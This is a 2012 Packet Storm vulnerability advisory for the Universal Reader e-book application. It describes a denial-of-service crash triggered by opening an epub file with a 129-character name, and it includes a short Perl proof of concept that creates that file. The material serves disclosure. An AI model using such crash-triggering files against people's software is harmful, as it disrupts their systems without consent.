Universal Reader 1.16.740.0 Denial Of Service

2012-05-14T00:00:00
ID PACKETSTORM:112676
Type packetstorm
Reporter demonalex
Modified 2012-05-14T00:00:00

Description

                                        
                                            `Title: Universal Reader Filename Denial Of Service Vulnerability  
Software : Universal Reader  
  
Software Version : 1.16.740.0 (product version: 0.63.538)  
  
Vendor: http://uread.superfection.com/   
  
Vulnerability Published : 2012-05-12  
  
Vulnerability Update Time :  
  
Status :   
  
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)  
  
Bug Description :  
Universal Reader is a online/offline reader for reading polytype e-book files.  
Universal Reader contains any denial of service vulnerability about openning long-name files. Success in exploiting this vulnerability will crumble uread.exe process.  
  
Proof Of Concept :  
-----------------------------------------------------------  
#!/usr/bin/perl -w  
$filename="a"x129;  
print "------Generate testfile \"a\"x129.epub------\n";  
open(TESTFILE, ">$filename.epub");  
sleep(3);  
close(TESTFILE);  
print "------Complete!------\n";  
exit(1);  
-----------------------------------------------------------  
  
Credits : This vulnerability was discovered by demonalex(at)163(dot)com  
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk  
Pentester/Researcher  
Dark2S Security Team/PolyU.HK  
`